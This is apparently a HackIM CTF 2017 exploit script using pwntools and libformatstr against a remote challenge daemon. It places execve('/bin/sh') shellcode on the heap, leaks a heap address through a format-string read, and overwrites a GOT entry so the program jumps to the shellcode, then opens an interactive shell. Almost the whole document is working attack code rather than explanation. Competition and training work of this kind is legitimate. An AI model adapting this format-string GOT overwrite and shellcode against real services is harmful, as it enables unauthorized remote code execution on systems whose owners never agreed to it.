Tags: #exploit #pwn
Rating:
from pwn import *
from libformatstr import *
#Exploit the daemon at 34.198.96.6:9001
#Exploitation Question 1 : 200 pts
#HACKIM CTF2017
#exploit by : Abdeljalil Nouiri
con = remote("34.198.96.6" , 9001)
#con = process("./level1.bin")
shellcode = "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80"
def ADD_book():
con.sendline("1")
con.recv()
con.sendline(shellcode)
con.recv()
con.sendline("1")
def Leak_heap_Nsend(GOT):
con.recv()
con.sendline("3")
con.recv()
con.sendline("%7$x")
find = con.recv()[16:-74]
calc = int("0x"+find,16)
pay = FormatStr(50)
pay[GOT] = calc
log.info("Heap address : "+hex(calc))
load = pay.payload(11 , 0)
con.sendline("3")
con.recv()
con.send(load)
con.interactive()
ptcGOT = 0x0804b038
#puts = 0x0804b02c
ADD_book()
Leak_heap_Nsend(ptcGOT)
